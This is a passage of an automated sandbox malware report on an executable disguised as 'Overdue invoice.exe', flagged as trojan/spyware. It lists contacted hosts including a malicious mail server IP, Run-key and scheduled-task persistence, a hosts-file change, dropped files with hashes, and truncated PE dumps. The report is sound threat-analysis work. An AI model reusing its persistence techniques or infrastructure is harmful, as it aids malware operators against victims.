                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://dWZLeu.comyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sandoll.co.kr$AOverdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.founder.com.cn/cnzOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comdOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.carterandcone.comlOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cnOverdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krF1Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlPOverdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/cabarga.htmlOverdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comB.TTFlCOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://I323GyXsTwT8KsWsK7L.netyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.commOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cne-dOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comoOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comdCOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.fontbureau.comalsOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiro.comhOverdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiro.comcOverdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  206.183.111.188
                                                  		mail.jkudyog.comUnited States
                                                  		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:635084
                                                  Start date and time: 27/05/202212:52:122022-05-27 12:52:12 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:Overdue invoice.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:32
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 80%
                                                  HDC Information:
                                                  • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                  • Quality average: 36.5%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                  • Execution Graph export aborted for target Overdue invoice.exe, PID 7124 because there are no executed function
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:53:25API Interceptor703x Sleep call for process: Overdue invoice.exe modified
                                                  12:53:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  12:53:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  12:53:58API Interceptor456x Sleep call for process: yqWDN.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue invoice.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yqWDN.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Temp\tmp2055.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1645
                                                  Entropy (8bit):5.196427141159646
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                  MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                  SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
                                                  SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                  SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                  C:\Users\user\AppData\Local\Temp\tmpA306.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1645
                                                  Entropy (8bit):5.196427141159646
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                  MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                  SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
                                                  SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                  SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                  C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):731648
                                                  Entropy (8bit):7.384642302436539
                                                  Encrypted:false
                                                  SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                  MD5:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  SHA1:B1F681EB0C5B406BAD2414829D003568AB44982C
                                                  SHA-256:8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
                                                  SHA-512:4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 60%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.

                                                  C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):731648
                                                  Entropy (8bit):7.384642302436539
                                                  Encrypted:false
                                                  SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                  MD5:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  SHA1:B1F681EB0C5B406BAD2414829D003568AB44982C
                                                  SHA-256:8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
                                                  SHA-512:4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 60%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.

                                                  C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Windows\System32\drivers\etc\hosts

                                                  Download File
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):835
                                                  Entropy (8bit):4.694294591169137
                                                  Encrypted:false
                                                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                  MD5:6EB47C1CF858E25486E42440074917F2
                                                  SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                  SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                  SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                  Malicious:true
                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.384642302436539
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:Overdue invoice.exe
                                                  File size:731648
                                                  MD5:21c2f8cc3f1d71ffb036ca3788a346b6
                                                  SHA1:b1f681eb0c5b406bad2414829d003568ab44982c
                                                  SHA256:8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
                                                  SHA512:4a6be00ecbe056b5951926a87529a0993d5902841bb491460f8f6eae1aab017ff4ee2e8af3c604ae0540c14b56751f517554afc863918ab92362b3339a3ce406
                                                  SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                  TLSH:75F4CF20F71FB8D1D66EC6740BB686221EA14D7EFCF9921E5597314B0A31392601BCAF
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.....................H........... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:04fcf0b0d4a6e46c

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x47fe9a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x628EC311 [Thu May 26 00:00:17 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7fe400x57.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x345bc.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
